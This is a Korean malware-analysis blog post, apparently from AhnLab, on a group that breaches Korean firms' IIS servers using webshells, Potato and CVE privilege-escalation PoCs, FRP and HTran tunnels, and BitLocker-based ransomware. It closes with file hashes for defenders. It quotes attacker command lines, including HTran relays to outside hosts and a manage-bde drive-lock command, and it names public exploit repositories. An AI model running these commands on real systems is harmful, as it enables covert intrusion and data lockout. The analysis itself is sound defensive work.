최근 외부에 노출된 취약한 서버를 시작으로 하여 침투한 공격자가 내부 네트워크까지 장악하는 침해 사고가 국내 기업들을 대상으로 빈번히 이루어지고 있다.
- 취약한 Atlassian Confluence 서버를 대상으로 하는 공격 사례
- 국내 의료기관의 취약한 서버를 대상으로 유포된 미터프리터(Meterpreter)
- 취약한 MySQL 서버를 대상으로 유포 중인 AsyncRAT 악성코드
이번 사례는 IIS 웹서버나 MS Exchange 서버 침해 사고로 기존에 알려진 유형과 동일하나, 개인이 아닌 특정 공격 그룹으로 추정되는 사례를 소개하고자 한다. 해당 그룹의 가장 큰 특징을 FRP 오픈소스 도구를 사용한다는 점이다. 이 그룹은 외부에서 접근 가능한 서버를 찾아 공격하며 침투가 이뤄지면 권한 상승을 시도한다.
이후 더욱 완벽한 접근 제어를 위해 FRP(Fast Reverse Proxy)나 LCX(Htran 이라고 불림) 도구를 설치하는데, 특히 FRP 도구를 주로 사용하였다. 또한 FRP를 설치 시 특정 다운로드 주소를 사용하는데, FRP가 업로드된 다운로드 서버는 국내 기업의 웹 서버로 공격자가 이미 장악한 후 악용하고 있는 것으로 보인다. 이 밖에도 FRP를 설치 시 특정 파일명을 사용하거나 또 다른 국내 기업의 서버를 장악해 FRP 사용 시 필요한 중계 서버로서 악용했다는 점이 특징이다.
현재 침해가 발생한 것으로 추정되는 기업은 반도체 업체, 사출기 업체, 리조트 업체, 건설 업체, 소프트웨어 업체 등 20여 곳으로 공격자는 구체적인 분야를 가리지 않고 공격을 시도한 것으로 보인다. 특히 이번 케이스는 외부 취약한 서버를 시작으로 최종 단계인 랜섬웨어까지 감염된 사례가 있어 각별한 주의가 필요하다.
1. ASP 웹쉘
취약한 웹서버를 대상으로 하는 공격에는 대부분 웹쉘이 사용된다. 웹쉘은 웹 서버에 업로드되어 파일 탐색이나 시스템 쉘 명령들을 실행할 수 있게 하는 파일로서 공격 대상 시스템에 설치되면 공격자들은 지속성을 유지하면서 감염 시스템을 제어할 수 있다.
웹 서버에 따라 지원하는 언어가 달라지며 그 말은 웹쉘의 언어도 달라지는 것을 의미한다. 예를들어 PHP를 지원하는 아파치 웹 서버에서는 PHP 웹쉘이 사용되며 톰캣과 같은 자바 환경에서는 JSP, IIS 웹 서버는 ASP 및 ASPX로 개발된 웹쉘이 사용된다.
여기에서는 취약한 IIS 웹 서버를 대상으로 공격한 사례를 다루기 때문에 ASPX(ASP) 웹쉘이 공격에 사용되었다. ASPXSpy는 대표적인 ASPX 웹쉘로서 공격자가 다수의 공격에 사용한 이력이 확인된다.
i. ASPXSpy
ASPXSpy는 비밀번호를 필요로 하기 때문에 설치된 경로에 접속한 후 비밀번호 입력 창에서 정확한 비밀번호를 입력해야 다음과 같은 제어 패널을 사용할 수 있다. (참고로 비밀번호는 MD5 해시 값을 비교해서 검증하는데 위의 웹쉘은 공격자가 비밀번호를 변경한 것으로서 “admin”이 아니다.)
공격자는 이 패널에서 정보 조회, 파일 생성, 프로세스 실행과 같은 다양한 악성 행위를 수행할 수 있다.
2. 권한 상승
업로드된 웹쉘은 IIS 웹 서버 프로세스 즉 w3wp.exe 프로세스에 의해 실행된다. 일반적으로 w3wp.exe 프로세스는 낮은 수준의 권한을 가지고 있기 때문에 정상적인 악성 행위를 수행하기 위해서는 더 높은 권한을 필요로 한다. 이에 따라 공격자들은 다양한 툴들을 이용해 높은 권한을 획득하는 권한 상승 과정이 필요하다.
공격자들은 일반적으로 JuicyPotato, SweetPotato와 같은 악성코드들을 이용했으며, 이외에도 다양한 로컬 권한 상승(LPE : Local Privilege Escalation) 취약점 PoC를 사용한 이력도 확인된다. 여기에서는 권한 상승 단계에서 사용된 각각의 사례에 대해 정리한다.
2.1. Potato
포테이토는 깃허브에 공개된 오픈 소스 권한 상승(Privilege Escalation) 도구이다. 현재 실행 중인 프로세스 계정의 토큰 중 특정 권한(Privilege)을 악용하는 방식으로서 시스템 권한으로 권한을 상승시켜 주는 기능을 제공한다.
IIS 웹 서버에서는 w3wp.exe 프로세스가 웹 서비스를 담당하며 MS-SQL 서버에서는 sqlservr.exe 프로세스가 MS-SQL 서비스를 담당한다. 예를 들어 w3wp.exe 프로세스는 IIS Apppool\DefaultAppPool가 주체로 실행되는데 이 경우에는 일반적인 관리자나 표준 사용자 계정과 달리 프로세스 및 파일과 같은 다양한 기능을 수행하기에 제약이 따른다.
즉 공격자들은 웹쉘이나 사전 공격을 통해 해당 프로세스를 제어할 수 있다고 하더라도 적절한 권한이 존재하지 않기 때문에 원하는 악성 행위를 수행할 수 없다. 이를 위해 권한 상승이 필요한데 일반적으로 w3wp.exe 프로세스나 sqlservr.exe 프로세스가 SeAssignPrimaryToken 또는 SeImpersonate 권한을 가지고 있다. 대부분의 포테이토 도구는 이렇게 SeAssignPrimaryToken 또는 SeImpersonate 권한이 활성화된 프로세스 악용하여 시스템 권한 즉 NTAUTHORITY\SYSYEM 계정으로 권한 상승하며, 이에 성공할 경우 공격자는 해당 시스템 내에서 제약 없이 대부분의 악성 행위를 수행할 수 있다.
포테이토 권한 상승 도구는 JuicyPotato, RoguePotato, RottenPotato 등 여러 종류가 있다. 하지만 국내에서 확인된 대부분 사례의 경우 세 가지 종류의 포테이토 도구를 사용되었다.
| Potato 종류 | MD5 |
|---|---|
| JuicyPotato | 0311ee1452a19b97e626d24751375652 808502752ca0492aca995e9b620d507b 4bafbdca775375283a90f47952e182d9 |
| BadPotato | 9fe61c9538f2df492dff1aab0f90579f ab9091f25a5ad44bef898588764f1990 87e5c9f3127f29465ae04b9160756c62 |
| SweetPotato | fd0f73dd80d15626602c08b90529d9fd 937435bbcbc3670430bb762c56c7b329 |
2.2. 취약점 (익스플로잇)
공격자들은 Potato 유형의 악성코드들 외에도 깃허브에 공개되어 있는 다양한 권한 상승 취약점(LPE : Local Privilege Escalation) PoC들을 이용한다. 다음은 공격에 사용된 취약점들과 각각의 취약점을 악용하는 PoC 악성코드들의 목록이다.
| 취약점 | 유형 | MD5 | 비고 |
|---|---|---|---|
| CVE-2018-8440 | LPE | 4c56462a3735dba9ee5f132f670e3fb1 | https://github.com/alpha1ab/Win2016LPE |
| CVE-2019-1405 + CVE-2019-1322 | LPE | 2e2ddfd6d3a10d5dd51f8cbdeaeb4b75 6a60f718e1ecadd0e26893daa31c7120 | https://github.com/apt69/COMahawk |
| CVE-2021-1675 | LPE | e81a9b194cf1bcd4f1bbf21338840ece | https://github.com/evilashz/CVE-2021-1675-LPE-EXP |
| CVE-2021-1732 | LPE | d406d8889dc1f2d51954808f5587415d ed1762b09d0a966d7a2d6c9167ea5499 | https://github.com/KaLendsi/CVE-2021-1732-Exploit |
| CVE-2021-36934 | LPE | 055cc4c30260884c910b383bb81cf7c8 | https://github.com/GossiTheDog/HiveNightmare |
| CVE-2021-40449 | LPE | b08b660ed646c390d5a254070123c74c | https://github.com/ly4k/CallbackHell |
| CVE-2022-21882 | LPE | 018dd881f5bf9181b70f78d7d38bd62a | https://github.com/sailay1996/cve-2022-21882-poc |
| CVE-2022-21999 | LPE | 31eb70dc11af05ec4d5cda652396970c b77e3a7e13e39829383fabf436e9c8f2 (Payload) | https://github.com/ly4k/SpoolFool |
다음은 CVE-2021-1732 취약점을 이용해 권한 상승하는 PoC이다. 권한 상승 이후 인자로 전달받은 whoami를 실행하며 그 결과 시스템 계정으로 권한 상승에 성공한 것을 알 수 있다.
다음은 CVE-2022-21999 PoC로서 권한 상승 이후 지정한 DLL을 로드하여 악성코드를 실행시킬 수 있다. 공격에 사용된 DLL은 PoC와 동일한데, DLL은 admin 계정을 생성하고 비밀번호를 Passw0rd! 로 설정하는 기능을 한다. 공격자는 추후 이렇게 등록된 계정으로 원격 접속하여 감염 시스템을 장악할 수 있다.
3. 프록시 & 포트 포워딩
3.1. FRP
FRP(Fast Reverse Proxy)의 기본적인 용도는 직접 통신할 수 없는 인트라넷 PC에 외부에서 접근 가능하도록 중계기 및 서버를 구성하는 오픈소스 도구다. 기업은 네트워크 구성 시 일부 서버를 제외하고 망을 분리하거나 방화벽을 사용해 외부에서 직접 접근하기 어렵도록 설계하기 때문에, 사용자는 내부망 PC와 직접 RDP 통신 원할 시 FRP와 같은 프로그램을 사용해야 한다. 그러나 공격자들은 이러한 목적보다 기업의 공격 대상 PC(Victim)에 자신의 주소를 남기지 않기 위해 해당 도구를 빈번히 사용하고 있다.
Frp는 크게 Frps와 Frpc 2가지로 나뉜다. Frps는 중간 서버에 설치되는 파일로 공격자와 공격 대상의 연결을 맺어주는 역할을 수행하며, 설정에는 ‘Frps.ini’를 참조하며 사용자 임의대로 설정할 수 있다. 이는 연결 포트 및 로깅 방법 등을 결정한다. 따라서 Frps는 공격자와 공격 대상 PC, 모두가 접근 가능한 중계 서버에 설치되어야 한다.
Frpc는 공격자가 공격하려는 대상 PC에 설치되는 파일로, 설정에는 Frps 설정 방법과 마찬가지로 ‘Frpc.ini’를 통해 TCP나 UDP, HTTP 등 공격자가 사용할 네트워크 통신 방법과 Frps에 사용될 포트 번호(remote_port)와 실제 포트 번호(local_port) 등을 사용자 임의대로 설정할 수 있다. 악용되는 경우 보통 외부에서 직접 연결이 어려운 NAT 환경의 기업 PC에 설치된다.
FRP 연결 과정은 다음과 같다.
위 그림으로 살펴보면, 우선 Frps.exe를 중계기에 설치한다. Frps.exe는 Frps.ini 설정 파일을 참조해 Frpc.exe가 접근할 수 있도록 연결 포트(7000번)를 오픈하고 연결을 기다린다. 이후 공격 대상 PC에 설치되어 있는 Frpc.exe를 실행시켜 중계기(Frps.exe)와 연결을 시도하는데, 이는 공격자와 공격 대상 PC를 간접적으로 연결하기 위해 Reverse Proxy 방식을 사용한다. 중계기와 공격 대상 PC가 연결이 완료되면 공격자는 특정 프로토콜(RDP)로 중계기의 특정 포트(23389번)에 연결을 시도한다.
중계기는 특정 포트(23389번)를 모니터링하다 연결이 확인되면 해당 데이터를 연결 포트(7000번)를 통해 공격 대상 PC에 전달한다. 이후 데이터를 받은 공격 대상 PC에선 해당 프로토콜(RDP)에 맞는 로컬 포트(3389번)에 포워드하여 작업을 완료한다. 따라서 다음과 같이 연결이 가능하다.
공격자들의 FRP 주 사용 목적은 1) ‘원격 데스크톱 연결’과 2) ‘공격자 IP 은닉’ 두 가지로 추정된다. 원격 데스크톱 연결이란 윈도우에서도 기본적으로 지원하는 도구로, RDP 통신을 이용해 원격지 서버에 직접 사용하는 것처럼 연결하는 방법을 말한다. 따라서 이러한 통신이 이뤄지게 되면 해당 PC와 네트워크 장비에는 공격자들의 IP가 로그에 남게 된다. 하지만 FRP를 사용하게 되면 공격자는 중계기에 연결하여 공격 대상 PC를 조작하기 때문에 침해사고 조사 시에도 공격 대상 PC에서는 공격자의 IP를 찾을 수 없다. 공격자는 보통 중계기 위치를 국내 기업 서버 또는 해외 호스팅 서버 등으로 설정한다. 특히 국내 기업 서버의 경우 이미 침해사고가 발생한 서버를 악용한 것으로, 공격자가 특 기업의 PC에 접근 시 중계기는 국내 IP이기 때문에 발각될 염려가 줄어든다. 따라서 공격자들은 직접 접근이 가능한 기업 PC라도 해당 환경에 Frpc를 설치한 뒤, 국내 또는 해외에 위치한 중계기 서버(Frps)를 통해 RDP 통신을 수행한다.
FRP를 사용한 특정 공격 그룹은 다음과 같은 특징을 가지고 있다.
| 1) 동일한 Frpc 파일 이름 사용 및 파일 경로 2) 국내 기업의 Frpc 다운로드 URL 주소 3) 국내 기업의 서버를 중계기(Frps) 서버로 사용 |
|---|
우선 국내 침해 기업에서 확인된 Frpc 설치 경로이다.
| %ALLUSERSPROFILE%\update.exe %ALLUSERSPROFILE%\info.zip %ALLUSERSPROFILE%\f.zip %ALLUSERSPROFILE%\t.zip %ALLUSERSPROFILE%\frpc.exe %SystemDrive%\perflogs\update.exe %SystemDrive%\temp\update.exe %SystemDrive%\temp\info.zip %SystemRoot%\temp\frpc.exe |
|---|
위 [표 3]의 붉은색의 경우 많은 기업에서 공통으로 확인된 파일명으로, 특정 그룹의 공격자들은 주로 Frpc 파일을 update.exe(update.zip) 혹은 info.exe(info.zip) 이름으로 설치하였다. 또한 공격자들이 사용한 Frpc 다운로드 URL의 경우 국내 침해 기업의 서버를 악용하는 것으로 확인되었다.
| – hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/info.zip – hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/update.zip – hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/f.zip |
|---|
이외에도 공격자들은 외부에서 연결 가능한 PC임에도 FRP를 통해 연결하도록 설정하였는데, FRP에서 사용되는 중계기 서버(Frps) 프로그램을 특정 국내 기업에 설치한 것으로 보아 국내 IP로 의심을 피함으로써 연결을 유지하고 또 자신들의 IP를 은닉하기 위해 사용하는 것으로 추정된다. 따라서 Frps가 설치된 국내 기업의 서버 또한 공격자에 의해 장악된 것으로 보인다.
2022년 국내 기업 서버 중 중계기로 사용된 기업은 현재까지 두 곳으로 확인된다. 아래의 그림과 같이 Remote IP 서버가 중계기 서버로 Frps가 설치되었으며, 좌측 Local IP가 Frpc가 설치된 서버로 공격자가 조작하려는 PC이다.
해당 중계기 서버는 아래와 같이 연결 가능하다.
3.2. HTran(LCX)
포트 포워딩이랑 특정 포트에서 전달받은 데이터를 다른 포트로 전달하는 기능이다. 이러한 포트 포워딩을 지원하는 툴로는 대표적으로 과거부터 사용되고 있는 HTran이 있는데 소스 코드가 공개되어 있음에 따라 다양한 공격자들에 의해 최근까지도 사용되고 있다.
여기에서는 해당 툴에 대한 간략한 정보와 함께 공격자가 이를 이용한 실제 공격 사례들을 다룬다. 먼저 HTran은 다음과 같이 3개의 모드가 지원된다.
이 중에서 “-tran” 모드는 특정 포트에서 전달받은 데이터를 특정 주소로 전달하는 기능을 제공한다. 다음 커맨드 라인은 실제 공격자가 HTran을 rdpclip라는 이름으로 생성한 후 실행한 명령이다. 참고로 rdpclip는 공격자가 소스 코드를 변조하여 인자 중 옵션을 제거하였으며, 대신 인자의 개수를 이용해 어떤 기능인지 파악하여 동작한다.
> %SystemRoot%\debug\rdpclip 110 127.0.0.1 3389
이러한 인자를 받아 실행될 경우 110번 포트로 바인딩하고 있다가 외부의 공격자가 110번 포트로 연결할 경우 로컬의 3389번 포트로 포워딩해준다. 이에 따라 공격자는 감염 시스템에 RDP를 연결할 때 3389번 포트 대신 110번 포트로 연결해도 정상적으로 원격 데스크탑을 사용할 수 있다.
다음은 공격에 사용된 rdpclip을 이용한 테스트로서, 로컬 시스템의 4444번 포트와 로컬 시스템의 80번 포트를 포워딩해주는 명령을 실행하였다. 이 경우 외부에서 “192.168.204.131:4444” 주소로 연결하더라도 “192.168.204.131:80” 포트로 연결한 것과 동일한 결과를 얻을 수 있다.
다음으로 “-listen” 모드가 있는데 인자로 2개의 포트 번호를 전달받아 각각의 포트에 바인딩하면서 대기한다. 만약 2개의 인자로 모두 연결이 확립될 경우 둘 중 하나의 포트에서 전달받은 데이터를 다른 포트로 포워딩한다. 일반적으로 “-listen” 모드는 “-slave” 모드와 함께 사용될 것이다. “-slave” 모드는 “-tran” 모드와 유사한데 “-tran” 모드가 로컬 시스템의 특정 포트를 열고 대기하고 있었다면 “-slave”는 지정한 주소에 직접 연결한다.
다음은 위와 동일한 악성코드이며 이름만 “p”로 변경되어 인자로 모드 종류를 전달받지 않지만 개수가 4개임에 따라 “-slave” 모드로 실행된다. 이러한 인자를 받아 실행될 경우 A(1**.**.***.*8):1000 주소로 연결 시도하며, 연결이 확립되면 로컬 시스템의 3389번 포트로 포워딩한다.
> p 1**.**.***.*8 1000 127.0.0.1 3389
시스템 A:1000 에서는 다음과 같이 HTran이 “-listen” 모드로 실행 중일 것이다. (예시를 위해 첫 번째 인자를 80으로 사용) 이에 따라 공격자는 A:80 주소로 접근하여 공격 대상 시스템에 RDP 접속이 가능해진다. A에서 실행 중이던 HTran이 80번 포트에서 전달받은 데이터를 1000번 포트로 전달하며, 1000번 포트는 공격 대상 시스템에서 실행 중인 HTran과 연결되어 있기 때문이다. 최종적으로 공격 대상 시스템의 HTran은 전달받은 데이터를 로컬 시스템의 3389번 포트로 포워딩한다.
> HTran.exe 1000 80
다음은 또 다른 예시이다. c.txt가 HTran이며 별다른 수정 사항이 없는 형태로서 “-slave”와 같은 인자도 그대로 사용된다. 다음 명령을 통해 실행된 HTran은 B(1**.***.**.*3):443 주소와 C(2**.***.**.6):1433 주소 사이에서 프록시로서 동작한다. 즉 공격자는 B 의 특정 주소에 접근함으로써 C:1433 즉 C 시스템의 MS-SQL 서버에 접근할 수 있게 된다.
> %SystemDrive%\webdriver\chrome\c.txt -slave 1**.***.**.*3 443 2**.***.**.6 1433
4. 랜섬웨어 감염 사례(BitLocker)
현재까지 확인된 사례 중 해당 그룹에 의한 랜섬웨어 감염 사례는 아직 그리 많지 않다. 공격 그룹은 랜섬웨어를 새로 만들지 않고 윈도우 정상 암호화 프로그램인 BitLocker를 악용하여 디스크 암호화를 수행하였다. BitLocker는 윈도우에서 자체적으로 제공하는 디스크 암호화 도구로 원래는 디스크 보안을 위해 사용되는 도구다. 이는 커맨드 라인 방식을 지원하는데, 기본적으로 Manage-bde라는 명령어를 사용해 BitLocker 기능을 사용할 수 있으며 드라이브를 잠그게 되면 접근 시 암호가 필요하다.
공격자는 아래와 같은 명령어를 통해 암호화를 수행하였다. 암호는 아래의 명령을 입력 시 GUI 창을 통해 설정할 수 있다.
(F: 드라이브는 예시)
| CMD> “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T |
|---|
드라이브 암호화 설정 후 아래의 명령어와 같이 lock을 통해 드라이브에 대한 접근을 불가능하도록 수행한다.
| CMD> manage-bde -lock -ForceDismount F: |
|---|
따라서 잠금이 완료되면 사용자는 암호를 알아야만 접근할 수 있다.
공격자가 사용한 랜섬 노트는 아래와 같다.
이번 사례의 공격 과정을 요약하자면 공격자들은 IIS 웹서버나 MS Exchange 서버와 같이 외부에서 접근 가능한 취약한 기업 PC를 대상으로 스캔하고 공격을 시도한다. 이후 웹쉘 등을 이용해 시스템 일부를 접근하며, 권한 상승(Privilege Escalation)을 지원하는 Potato 도구나 Exploit 도구를 악용해 시스템 권한을 획득한다. 다음에는 해당 시스템을 더욱 쉽게 조작하기 위해 LCX나 FRP 도구를 설치해 외부에서 RDP로 접속 가능하도록 설정하고 내부 전파 및 최종 단계(정보 유출 및 랜섬웨어)를 수행하였다.
이에 따라 서버 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존에 알려진 취약점으로부터 사전에 방지해야 한다. 또한 외부에 공개된 서버의 경우 보안 제품을 통해 외부인으로부터 접근을 통제할 필요가 있다.
[파일 진단]
– WebShell/Script.Generic (2020.12.11.09)
– WebShell/ASP.ASpy.S1361 (2021.02.02.03)
– WebShell/ASP.Generic.S1855 (2022.06.22.03)
– WebShell/ASP.Small.S1378 (2021.02.24.02)
– JS/Webshell (2011.08.08.03)
– HackTool/Win.SweetPotato.R506105 (2022.08.04.01)
– Exploit/Win.BadPotato.R508814 (2022.08.04.01)
– HackTool/Win.JuicyPotato.R509932 (2022.08.09.03)
– HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00)
– Exploit/Win.JuicyPotato.C425839(2022.08.04.01)
– Exploit/Win.SweetPotato.C4093454 (2022.08.04.01)
– Exploit/Win32.Consoler.R372759 (2021.03.18.00)
– Exploit/Win.HiveNightmare.R433315 (2021.07.23.02)
– Malware/Win64.Generic.C3164061 (2019.04.20.01)
– Malware/Win64.Generic.C3628819 (2019.12.11.01)
– Exploit/Win.Agent.C4448815 (2021.05.03.03)
– Exploit/Win.CVE-2022-21999.C4963688 (2022.02.11.03)
– Trojan/Win.Generic.C4963786 (2022.02.11.04)
– Trojan/Win.Exploit.C4997833 (2022.03.08.01)
– Ransomware/Win.CVE.C5065885(2022.04.11.01)
– Exploit/Win.Agent.C5224192 (2022.08.17.00)
– Exploit/Win.Agent.C5224193 (2022.08.17.00)
– Unwanted/Win.Frpc.C5222534 (2022.08.13.01)
– Unwanted/Win.Frpc.C5218508 (2022.08.03.03)
– Unwanted/Win.Frpc.C5218510 (2022.08.03.03)
– Unwanted/Win.Frpc.C5218513 (2022.08.03.03)
– HackTool/Win.Frpc.5222544 (2022.08.13.01)
– HackTool/Win.Frp.C4959080 (2022.02.08.02)
– HackTool/Win.Frp.C5224195 (2022.08.17.00)
– Unwanted/Win.Frpc.C5162558 (2022.07.26.03)
– Malware/Win.Generic.C5173495 (2022.06.18.00)
– HackTool/Win.LCX.C5192157 (2022.07.04.02)
[IOC]
MD5
ASP WebShell
– e31b7d841b1865e11eab056e70416f1a
– 612585fa3ada349a02bc97d4c60de784
– 3921d444a251661662f991b147e22bc3
– c802dd3d8732d9834c5a558e9d39ed37
– 6b4c7ea91d5696369dd0a848586f0b28
– 07191f554ed5d9025bc85ee1bf51f975
Potato
– 0311ee1452a19b97e626d24751375652 (JuicyPotato)
– 808502752ca0492aca995e9b620d507b (JuicyPotato)
– 4bafbdca775375283a90f47952e182d9 (JuicyPotato)
– 9fe61c9538f2df492dff1aab0f90579f (BadPotato)
– ab9091f25a5ad44bef898588764f1990 (BadPotato)
– 87e5c9f3127f29465ae04b9160756c62 (BadPotato)
– fd0f73dd80d15626602c08b90529d9fd (SweetPotato)
– 937435bbcbc3670430bb762c56c7b329 (SweetPotato)
Exploit
– 4c56462a3735dba9ee5f132f670e3fb1
– 2e2ddfd6d3a10d5dd51f8cbdeaeb4b75
– 6a60f718e1ecadd0e26893daa31c7120
– e81a9b194cf1bcd4f1bbf21338840ece
– d406d8889dc1f2d51954808f5587415d
– ed1762b09d0a966d7a2d6c9167ea5499
– 055cc4c30260884c910b383bb81cf7c8
– b08b660ed646c390d5a254070123c74c
– 018dd881f5bf9181b70f78d7d38bd62a
– 31eb70dc11af05ec4d5cda652396970c
– b77e3a7e13e39829383fabf436e9c8f2
Frpc
– 27303a52d7ebd666d2a84529f2c86b3c
– 4eb5eb52061cc8cf06e28e7eb20cd055
– 622f060fce624bdca9a427c3edec1663
– 72decb30e84cfe0d726f26c4f45dc1b0
– 7d9c233b8c9e3f0ea290d2b84593c842
– d862186f24e644b02aa97d98695c73d8
– df8f2dc27cbbd10d944210b19f97dafd
– 8de8dfcb99621b21bf66a3ef2fcd8138
HTran
– 47f091b0bfa0f3d6e6943d7f178a4dff
– 1b562817eadfb12f527bf25bf5c803b1
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹 […]
[…] 내용은 과거 블로그를 통해 자세히 소개되었다. 공격자는 윈도우 유틸리티인 BitLocker를 통해 […]
[…] 이러한 포트 포워딩을 지원하는 툴들은 다양하지만 여기에서는 대표적으로 소스 코드가 공개되어 과거부터 사용되고 있는 HTran을 기준으로 설명한다. 먼저 HTran은 다음과 같이 3개의 모드가 지원된다.[10] […]